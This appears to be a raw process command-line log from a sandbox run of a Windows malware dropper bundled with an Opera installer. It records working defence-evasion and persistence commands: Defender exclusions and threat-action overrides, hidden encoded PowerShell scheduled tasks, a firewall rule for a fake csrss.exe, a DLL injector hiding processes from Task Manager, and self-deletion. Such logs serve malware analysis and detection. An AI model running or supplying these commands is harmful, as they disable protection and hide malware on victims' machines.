"C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --silent --allusers=0
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6deae1a8,0x6deae1b4,0x6deae1c0
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --version
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
"C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1880 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240328142129" --session-guid=647b75d8-1d1a-401a-8239-98e5764e4505 --server-tracking-blob=Y2U2YTQyN2U5YjVmMmQ4YzU0ZTRjN2ZmZmY2YTQzODczNjNmOTVjMWM0ZWYzNWJjNGQyOWUxMzUxZTcxNzA5Yzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE2MzU2ODAuNDc4OCIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6IjdiOTU1ZDA5LTk4ZjktNDFhYy05MjA2LWQwOTBkM2FiMTJmMyJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=B005000000000000
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe
C:\Users\Admin\Pictures\Z1z6oEWmHWh3S9fVhayDhyvW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.33 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6d52e1a8,0x6d52e1b4,0x6d52e1c0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1464 -ip 1464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 1156
C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe
"C:\Users\Admin\Pictures\EwbpoERL2KXj9VGzo9QBTWpU.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7zS925D.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS9579.tmp\Install.exe
.\Install.exe /YnGgdidyhQpz "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe
"C:\Users\Admin\Pictures\CP1pPdaYSdNNSuryt7kujhW8.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gDKGtXeHw" /SC once /ST 07:43:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gDKGtXeHw"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Users\Admin\AppData\Local\Temp\7zSBEFA.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe
"C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"
C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe
"C:\Users\Admin\Pictures\rfVcCs84JgkadF5csIFA6eOA.exe"
C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe
"C:\Users\Admin\Pictures\LmaiU21tMWhBuhG73TdiEsIZ.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC0FE.tmp\Install.exe
.\Install.exe /YnGgdidyhQpz "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gOEzsPtTT" /SC once /ST 10:56:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gOEzsPtTT"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x3f0040,0x3f004c,0x3f0058
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 856 -ip 856
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 2732
C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe
"C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\PING.EXE
ping 2.2.2.2 -n 1 -w 3000
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gDKGtXeHw"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\kzkUUCH.exe\" id /pNsite_idAWZ 385118 /S" /V1 /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gOEzsPtTT"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 14:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe\" id /WZsite_idxpt 385118 /S" /V1 /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\GYSQssI.exe id /WZsite_idxpt 385118 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
